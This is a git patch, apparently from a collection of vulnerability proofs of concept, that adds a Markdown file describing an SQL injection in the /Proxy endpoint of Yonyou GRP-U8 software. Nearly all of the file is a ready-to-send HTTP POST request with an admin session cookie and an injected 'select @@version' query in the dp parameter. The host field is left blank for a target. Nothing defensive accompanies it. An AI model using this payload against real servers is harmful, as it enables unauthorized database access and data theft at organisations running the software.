From e80065d76d3fcc9452834df6f76cab6059bfadd6 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 28 Apr 2024 21:02:55 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BGRP-U8-Proxy?= =?UTF-8?q?=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友GRP-U8-Proxy存在SQL注入漏洞.md | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 用友GRP-U8-Proxy存在SQL注入漏洞.md diff --git a/用友GRP-U8-Proxy存在SQL注入漏洞.md b/用友GRP-U8-Proxy存在SQL注入漏洞.md new file mode 100644 index 0000000..cdefac8 --- /dev/null +++ b/用友GRP-U8-Proxy存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +## 用友GRP-U8-Proxy存在SQL注入漏洞 + + +## poc +``` +POST /Proxy HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +DNT: 1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=6B57CA2AD409BF61FDD38BB1497626D2; userId=admin; rdUsrId=false; rdName=true; complex=0 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 571 + + +cVer=9.8.0&dp=XML AS_DataRequest ProviderNameDataSetProviderData Dataselect @@version +```